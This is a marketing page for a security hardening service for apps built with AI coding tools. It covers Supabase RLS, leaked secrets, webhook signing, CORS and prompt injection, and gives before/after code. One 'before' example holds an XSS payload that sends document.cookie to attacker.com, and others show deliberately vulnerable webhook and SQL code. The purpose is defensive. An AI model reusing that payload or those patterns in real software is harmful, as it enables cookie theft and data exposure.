AI app security hardening — patch the RLS, secrets, and webhook gaps Lovable and Bolt shipped with
AI app security hardening is not optional. 48% of AI-generated code ships with vulnerabilities, Supabase RLS hardening is skipped on ~70% of Lovable apps, webhook signature verification is routinely absent, and a full secrets audit of an AI app usually finds keys in the client bundle. We audit every OWASP category, patch RLS, rotate secrets, sign webhooks, and ship a written report in 48 hours for a fixed $499. Updated Q2 2026: OWASP Top 10 for LLM Applications v2.0 was released in January, and most AI-built apps hit 7+ of its 10 categories; California AB-2630 took effect in April 2026, requiring breach disclosure for AI-generated apps.
Why AI builders ship broken AI app security hardening
Security is the thing AI coding tools are worst at, by a wide margin. Veracode's 2025 report found 48% of AI-generated code contains vulnerabilities — roughly one in two files. The Register documented 170 Lovable apps leaking data from over 18,000 users in a single incident. NIST assigned CVE-2025-53773 (CVSS 9.6) to GitHub Copilot. The problem isn't a bad prompt; it's that the models optimize for demo-ability, and every security control is friction on the demo.
The specific patterns we see almost every time: Supabase Row Level Security disabled (or 'enabled' with policies that allow anyone to read everything), secrets hardcoded into the client bundle, OAuth callbacks misconfigured so tokens are exchanged insecurely, no rate limits so your app can be scraped or DoS'd, CSRF protection missing on mutating endpoints, user input passed straight to SQL or HTML, CORS set to '*' because that was the fastest way to make the preview work. Every one of these is catastrophic at launch. Every one is a half-day fix if you know what you're doing. New in Q1 2026: we are now seeing prompt injection attacks against AI-generated admin dashboards — LLM-backed features (summaries, inline copilots, chat panels) that accept user-supplied text without sanitization can be steered into exfiltrating private data, and AI builders rarely ship the allowlist checks that stop it.
Source: The Register — 170 Lovable apps leaked 18k users' data
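The allowlist check mentioned above is small to sketch. A minimal illustration with hypothetical tool names (not a production defense on its own): any action an LLM feature proposes is checked against an explicit list of permitted operations, and everything else is refused, no matter what the user-supplied text told the model to do.

```typescript
// Hypothetical deny-by-default guard for LLM-backed features.
// Action names here are illustrative placeholders.
const ALLOWED_ACTIONS = new Set(["summarize_ticket", "draft_reply"]);

interface ProposedAction {
  name: string;
  args: Record<string, unknown>;
}

function authorizeAction(action: ProposedAction): boolean {
  // Unknown or injected actions never execute.
  return ALLOWED_ACTIONS.has(action.name);
}

// A prompt-injected "export_all_users" call is rejected before it runs.
console.log(authorizeAction({ name: "summarize_ticket", args: {} })); // true
console.log(authorizeAction({ name: "export_all_users", args: {} })); // false
```

The point is the default: the model's output selects from a fixed menu, it never defines the menu.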
Which AI builder shipped your broken AI app security hardening?
The AI app security hardening failure mode usually depends on the tool that shipped the code. Find your builder below, then read the matching problem page.
| AI builder | What breaks in AI app security hardening | Go to |
|---|---|---|
| Lovable | RLS disabled on ~70% of apps; Supabase public key granting full access | Lovable RLS fix → |
| Bolt.new | Hardcoded secrets in client bundle; Stripe webhooks unverified | Bolt security → |
| v0 | Backend-less; when added, no rate limits, no input validation | v0 auth → |
| Cursor | Security drifts across files; OAuth flow sometimes split insecurely | Cursor rescue → |
| Replit Agent | Secrets in repl env exposed; public URLs default | Replit rescue → |
| Claude Code | Generally better — still misses rate limits and CORS hardening | Claude Code rescue → |
| Windsurf | Enterprise compliance gaps — audit logs, RBAC, SSO misconfig | Windsurf compliance → |
| Base44 | Proprietary runtime; we audit and migrate to owned stack if needed | Base44 rescue → |
Anatomy of the 170-Lovable-apps breach — and how AI-built apps keep repeating it
The Register documented the pattern in February 2026: 170 Lovable-built apps leaked data from over 18,000 users in a single disclosure wave. The failure mode, quoted directly from the case study, was 'authenticated users were blocked; unauthenticated visitors had full access to all data.' That is not a missing policy — that is an inverted policy. The RLS rule was present, but its condition was reversed, and the Supabase anon key (which ships in every client bundle by design) became an open door to the entire database.
The upstream cause is demo-ability. Lovable, Bolt, v0, and their peers optimize for the moment the founder says 'wow, it works.' Every security control adds friction to that moment. RLS breaks the happy path during iteration, so the AI disables it. Rate limits make the model's test loop slow, so they go unimplemented. CORS restrictions block the preview, so CORS gets set to '*' and stays that way. Webhook signing secrets require a production environment to test, so the webhook handler just returns 200. Every individual decision is pragmatic for the demo and catastrophic at launch.
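The CORS half of that list takes minutes to do right. A minimal sketch, assuming an explicit per-environment allowlist (the domains are placeholders): echo the origin back only when it is on the list, and never fall back to '*'.

```typescript
// Sketch of an explicit CORS allowlist. Placeholder domains —
// substitute your production and preview URLs.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://preview.example.com",
]);

function corsHeaderFor(origin: string | null): string | null {
  // Return the origin only if allowlisted. A null result means
  // "send no Access-Control-Allow-Origin header at all", which
  // browsers treat as a cross-origin denial.
  if (origin && ALLOWED_ORIGINS.has(origin)) return origin;
  return null;
}
```

Wire the result into every API response; an unlisted origin simply gets no CORS header.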
A practical illustration: a seed-stage SaaS reached us two days before their pen-test. Bolt.new had shipped them an admin panel gated by a client-side `if (user.role === 'admin') { show(<AdminPanel/>) }` check. The route itself was not protected server-side. A single DevTools edit to the user object bypassed the gate and exposed every admin API the UI called. The admin APIs, in turn, trusted the client's claim because the AI had not written server-side role verification. The pen-tester would have found it in ten minutes. We fixed it in two hours: role checks moved to server middleware, RLS policies added for admin-scoped tables, and a test that logs in as a regular user and attempts every admin route was wired into CI. The pen-test report came back clean on those vectors. The founder asked, justifiably: how was this ever supposed to work? It wasn't. The AI shipped the shape of a secured admin panel without the substance.
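The shape of that fix, sketched with illustrative names rather than the client's actual code: the role check runs on the server against a session the server itself verified, so no DevTools edit can reach past it.

```typescript
// Illustrative server-side guard. `session` comes from a server-verified
// source (e.g. a signed HttpOnly cookie), never from the request body.
interface Session {
  userId: string;
  role: "admin" | "user";
}

function requireAdmin(session: Session | null): { allowed: boolean; status: number } {
  if (!session) return { allowed: false, status: 401 };               // not signed in
  if (session.role !== "admin") return { allowed: false, status: 403 }; // signed in, wrong role
  return { allowed: true, status: 200 };
}

// Every admin route calls the guard before doing any work, e.g.:
// const gate = requireAdmin(await getVerifiedSession(req));
// if (!gate.allowed) return new Response("forbidden", { status: gate.status });
```

The client-side `if (user.role === 'admin')` check can stay for UI purposes; it just stops being the security boundary.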
Veracode's 2025 State of Software Security confirmed the scale: 48% of AI-generated code contains known vulnerabilities. That is not a prediction — it is measured across a multi-year benchmark. Combined with NIST's CVE-2025-53773 (CVSS 9.6) against GitHub Copilot's auto-generated code paths, the evidence is unambiguous: AI-generated code is materially less secure than human-generated equivalent, and the delta is not shrinking. A security hardening pass is not optional for a launched AI-built app; it is the difference between running a real business and making the next disclosure headline.
When we audit, the same eight categories surface over and over: RLS disabled or inverted, secrets in the client bundle, webhook handlers without signature checks, CORS set to '*', no rate limiting, input pipes straight to SQL or HTML, OAuth redirects leaking tokens in URL fragments, and missing security headers (CSP, HSTS, X-Frame-Options). Each is a 2-to-8 hour fix individually. The value of the engagement is that we do them all, consistently, before a real user — or a researcher — finds them for you.
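To make the webhook category concrete, here is what signature verification reduces to under the hood. This sketch is modelled on Stripe's `t=...,v1=...` header scheme using Node's built-in crypto; in production the patch uses the official SDK's `constructEvent`, which does the same work plus timestamp tolerance checks.

```typescript
import { createHmac, timingSafeEqual } from "node:crypto";

// Sketch of Stripe-style webhook signature verification.
// Header shape assumed: "t=<unix ts>,v1=<hex hmac>".
function verifySignature(payload: string, header: string, secret: string): boolean {
  const parts = new Map(
    header.split(",").map((p) => p.split("=") as [string, string])
  );
  const timestamp = parts.get("t");
  const signature = parts.get("v1");
  if (!timestamp || !signature) return false;

  // HMAC-SHA256 over "<timestamp>.<raw payload>" with the webhook secret.
  const expected = createHmac("sha256", secret)
    .update(`${timestamp}.${payload}`)
    .digest("hex");

  // Constant-time compare to avoid timing side channels.
  const a = Buffer.from(expected, "hex");
  const b = Buffer.from(signature, "hex");
  return a.length === b.length && timingSafeEqual(a, b);
}
```

A handler that skips this check will happily mark orders paid for anyone who can send a POST.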
What an AI app security hardening rescue engagement ships
From first diagnostic to production handoff — the explicit steps on every AI app security hardening engagement.
- 01
Free diagnostic
We scan your repo and live URL for the top 10 AI-built-app failure modes: RLS, secrets, CORS, webhooks, rate limits, auth, input validation, CSP, CSRF, IDOR. Written triage in 48 hours.
- 02
$499 security audit
Full written audit — every finding has severity (critical/high/medium/low), CWE reference, file/line, and a specific patch. Delivered in 48 hours.
- 03
Critical fixes first
We patch everything critical and high in the same engagement if you want — RLS policies written and tested, secrets rotated and moved to env, webhook signature verification added, rate limits wired up.
- 04
Regression guards
We add automated checks so the AI can't reintroduce the holes: Zod validation at API boundaries, CSP headers, lint rules banning dangerouslySetInnerHTML, CI checks for hardcoded secrets.
- 05
Written handoff
You get the report, the patches, and a runbook: what to watch, what to rotate annually, what to add to the pentest when you raise your Series A.
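The CI secrets check from step 04 can be as simple as a pattern scan over the built bundle. A sketch with a deliberately short, non-exhaustive pattern list; real engagements use a maintained scanner, but this catches the most common leaks.

```typescript
// Minimal secrets scan over built output. Patterns are illustrative,
// not exhaustive — a real pass also checks provider-specific formats.
const SECRET_PATTERNS: RegExp[] = [
  /sk_live_[A-Za-z0-9]+/, // Stripe live secret key
  /sk_test_[A-Za-z0-9]+/, // Stripe test secret key
  /service_role/,         // Supabase service role key reference
];

function findSecretLeaks(bundleText: string): string[] {
  const hits: string[] = [];
  for (const pattern of SECRET_PATTERNS) {
    const match = bundleText.match(pattern);
    if (match) hits.push(match[0]);
  }
  return hits;
}

// Wire into CI: read the built bundle and fail the build on any hit.
```

Run against every file in the build output directory; a single match should fail the pipeline.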
Every AI app security hardening rescue audit checks
The diagnostic pass on every AI app security hardening rescue. Each item takes under 10 minutes; together they cover the patterns that cause 90% of AI-built-app failures.
- 01Supabase RLS on every table
We enumerate every table and check: is RLS enabled, and is at least one non-trivial policy defined. Policies like `USING (true)` are flagged — they satisfy the 'enabled' check without enforcing anything.
- 02Anon-key surface mapping
We map every read and write the anon key can perform. If the anon key can read any user-private table, it's critical.
- 03Secrets grep across client bundle
The built JS bundle is greppable. We search for sk_, sk_live, sk_test, service_role, API_KEY, and other common secret patterns. Every match is a critical finding.
- 04Webhook signature verification
Stripe, GitHub, Clerk — every webhook handler must verify the signature before acting. Unverified handlers are trivially forgeable.
- 05Rate limits on auth endpoints
Sign-up, sign-in, password reset. No rate limit means DoS-able and brute-forceable. We check for Upstash, Vercel Edge rate limits, or middleware.
- 06Input validation with Zod or equivalent
Every API route must parse req.body before it reaches the database. Raw concatenation into SQL or HTML is a critical finding (OWASP A03).
- 07CORS policy
Access-Control-Allow-Origin should be an explicit allowlist, not '*'. We check every API response.
- 08CSP, HSTS, and security headers
We run Mozilla Observatory against the live URL. Scores under B are flagged; we tune next.config.js to ship the right headers.
- 09OAuth redirect and token flow
Tokens should arrive via POST, not URL fragment. Redirect URIs should exactly match provider allowlists. Token refresh should be server-side.
- 10IDOR checks on object access
Can user A access user B's object by guessing the ID? We test every authenticated GET, PATCH, DELETE with the wrong user's UUID.
- 11Dependency CVE scan
npm audit or pnpm audit, cross-referenced with NIST NVD. Known criticals in shipped dependencies are flagged.
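Item 05's fix needs no infrastructure to sketch. A minimal in-memory fixed-window limiter follows; it only works on a single instance, so production deployments typically use Upstash or edge middleware as noted above, but the logic is the same.

```typescript
// Minimal fixed-window rate limiter, in-memory. Single-instance only;
// a multi-instance deployment needs shared state (e.g. Redis).
const WINDOW_MS = 60_000;  // 1-minute window
const MAX_ATTEMPTS = 5;    // attempts allowed per window

const attempts = new Map<string, { count: number; windowStart: number }>();

function allowRequest(key: string, now: number = Date.now()): boolean {
  const entry = attempts.get(key);
  if (!entry || now - entry.windowStart >= WINDOW_MS) {
    // First request in a fresh window: reset the counter.
    attempts.set(key, { count: 1, windowStart: now });
    return true;
  }
  entry.count += 1;
  return entry.count <= MAX_ATTEMPTS;
}

// Keyed per IP + endpoint, e.g. allowRequest(`${ip}:sign-in`).
```

Five attempts per minute per IP on sign-in and password reset is enough to stop brute force without annoying legitimate users.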
Common AI app security hardening patterns we fix
These are the shapes AI-generated code arrives in — and the shape we leave behind.
- 01 Before: `ALTER TABLE users DISABLE ROW LEVEL SECURITY;` — anon key reads and writes every row. The 170-Lovable-apps pattern.
  After: RLS enabled; policies scoped with `auth.uid() = user_id` on owning tables and role-checked on admin tables. Tested against every role.
- 02 Before: `export async function POST(req) { const body = await req.json(); await markOrderPaid(body.order_id); return new Response('ok'); }` — anyone can POST.
  After: Stripe-Signature header parsed, constructEvent called with the webhook secret, handler runs only on verified events. Idempotency key stored to prevent replay.
- 03 Before: `NEXT_PUBLIC_SUPABASE_SERVICE_ROLE_KEY=...` in .env. Key ships in the client bundle. App has full admin access from any user's browser.
  After: Service role key confined to server routes and environment. Client uses the anon key only. Env var named without the NEXT_PUBLIC_ prefix; a pre-flight check enforces this.
- 04 Before: `Access-Control-Allow-Origin: *` on every API response. Any origin can call your API with browser-held cookies.
  After: Explicit allowlist keyed to deployment environment. Production allows only your domain; preview allows your preview URL.
- 05 Before: `create function search(q text) returns table(...) as $$ ... where name like '%' || q || '%' $$` — injection trivial once quoted.
  After: Parameterized queries, `format()` with `%L` or prepared statements, input validation before the call.
- 06 Before: Comments or bios rendered via `dangerouslySetInnerHTML`. User injects `<script>fetch('https://attacker.com/?c='+document.cookie)</script>`.
  After: DOMPurify sanitization, or render as plain text, or restrict to a markdown subset with a vetted renderer.
- 07 Before: OAuth callback returns `#access_token=...` which JavaScript parses client-side. Tokens leak to analytics, referrers, browser history.
  After: PKCE + server-side token exchange. Tokens never touch the URL. Session cookie set HttpOnly, Secure, SameSite=Lax.
AI app security hardening red flags in AI-built code
If any of these are true in your repo, the rescue is probably worth more than the rewrite.
Fixed-price AI app security hardening engagements
No hourly meter. Scope agreed up front, written fix plan, delivered on date.
- Security audit ($499) — 48hr turnaround. Full written audit, every finding with a patch.
- Break the fix loop — Audit + critical fixes + regression guards + tests.
What AI app security hardening rescues actually cost
Anonymized, representative scopes from recent AI app security hardening rescues. Every price is the one we actually quoted.
A founder who built a Lovable habit-tracker, has 90 beta users, and is scared to launch publicly after reading The Register piece. The audit surfaces 11 findings (3 critical); we write the RLS policies and wire up webhook signing.
- Scope: 48-hour audit + critical and high remediation. RLS policies, webhook signing, secret rotation, env var guards.
- Duration: 1 week
A seed-stage SaaS on Bolt + Supabase preparing for SOC 2 Type 1. Enterprise customer asked for a third-party security review in the sales cycle.
- Scope: Full audit, remediation of every critical and high, CSP implementation, audit log bootstrap, pen-test prep document.
- Duration: 3 weeks
A growth-stage fintech with a Lovable admin tool processing real money. Regulatory inquiry triggered a security review with a 60-day remediation window.
- Scope: Full audit, remediation including auth overhaul, RBAC, audit logs, SIEM integration, and a formal response to the inquiry's findings.
- Duration: 6-8 weeks
Patch in place, hard-rotate secrets, or full auth migration?
Roughly 70% of security engagements are patches in place: enable RLS, sign the webhooks, move secrets to server-side env vars, deploy security headers. The app stays where it is, the team keeps using their AI builder, and the rescue ships in about a week, leaving the original codebase materially safer with no architectural change.
About 20% require a hard secret rotation alongside the patches. The signal is that secrets have been in the client bundle for long enough — or visible in a public Git history — that the right assumption is they are compromised. Stripe restricted keys can be revoked in seconds; Supabase service role keys require a project-level rotation that can disrupt active sessions; OAuth client secrets need coordination with the provider's allowlist. We sequence the rotation to minimize user impact and document every step in case a future incident requires re-examining the timeline.
The remaining 10% need a full auth migration. The signal is that the auth provider itself has been mis-implemented in a way that can't be patched cleanly — for example, sessions stored in localStorage instead of HttpOnly cookies, or roles stored in the JWT claim without server-side verification. In those cases we recommend moving to Clerk or rebuilding on Supabase Auth with the patterns done correctly. The migration is invisible to most users (passwordless re-verification email plus a one-shot token exchange) but it does require a planned cutover window and a rollback plan. We have done this many times and the pattern is now standard.
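The cookie half of that migration is small. A sketch of the session cookie attributes involved (the cookie name is illustrative): HttpOnly keeps the token away from JavaScript and XSS exfiltration, Secure restricts it to HTTPS, and SameSite=Lax blunts CSRF.

```typescript
// Builds a Set-Cookie header value for a server-held session token.
// Cookie name "session" is a placeholder.
function sessionCookie(token: string, maxAgeSeconds: number): string {
  return [
    `session=${encodeURIComponent(token)}`,
    `Max-Age=${maxAgeSeconds}`,
    "Path=/",
    "HttpOnly",       // invisible to document.cookie and injected scripts
    "Secure",         // HTTPS only
    "SameSite=Lax",   // not sent on cross-site POSTs
  ].join("; ");
}
```

Compare this with a token in localStorage, which any XSS payload can read and ship to an attacker in one line.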
AI app security hardening runbook and reference material
The documentation, CLIs, and specs we rely on for every AI app security hardening engagement. We cite, we don't improvise.
- OWASP Top 10 (2024)
The industry baseline for web application security findings.
- Supabase — Row Level Security
The canonical reference for RLS patterns we write and verify.
- Stripe — Webhook signature verification
Every Stripe webhook audit starts here.
- Mozilla Observatory
Our automated headers and TLS check for every live URL.
- NIST NVD — CVE database
Cross-reference for dependency and vendor findings.
- The Register (Feb 2026) — Lovable vulnerability disclosure
Cited in every audit report's executive summary.
- Next.js — Content Security Policy
The CSP config we deploy for Next.js apps on Vercel.
AI app security hardening rescues we've shipped
Related AI app security hardening specialists
Full AI-built app code audit beyond security — architecture, perf, test coverage, TypeScript strictness.
Supabase RLS hardening, auth flow, realtime channels, storage bucket policies — the whole Supabase security surface.
OAuth callbacks, session refresh, RBAC, SSO — auth bugs that sit adjacent to AI app security hardening.
Related AI app security hardening problems we rescue
Fintech-specific AI app security hardening — KYC, PII, PCI-adjacent auditing, data-residency review.
Healthtech AI app security hardening — PHI handling, HIPAA-aware architecture, audit logs for Supabase.
The explainer behind the #1 AI app security hardening finding.
The pre-launch secrets audit AI app checklist — every category we run before a production deploy.
The core AI app security hardening service — 48-hour written report with patches.
Lovable-specific Supabase RLS hardening and webhook signature verification.
AI app security hardening questions founders ask
Sources cited in this dossier
- Veracode 2025 State of Software Security — AI code
- The Register (Feb 2026) — 170 Lovable apps, 18k users exposed
- NIST NVD — CVE-2025-53773 (GitHub Copilot, CVSS 9.6)
- OWASP Top 10 (2024)
- Supabase — Row Level Security docs
- Stripe — Webhook signature verification
- Mozilla Observatory — security headers scanner
- Next.js — Content Security Policy
Your AI builder shipped broken AI app security hardening. We ship the fix.
Send the repo. We'll tell you exactly what's wrong in your AI app security hardening layer — and the fixed price to ship it — in 48 hours.
Book free diagnostic →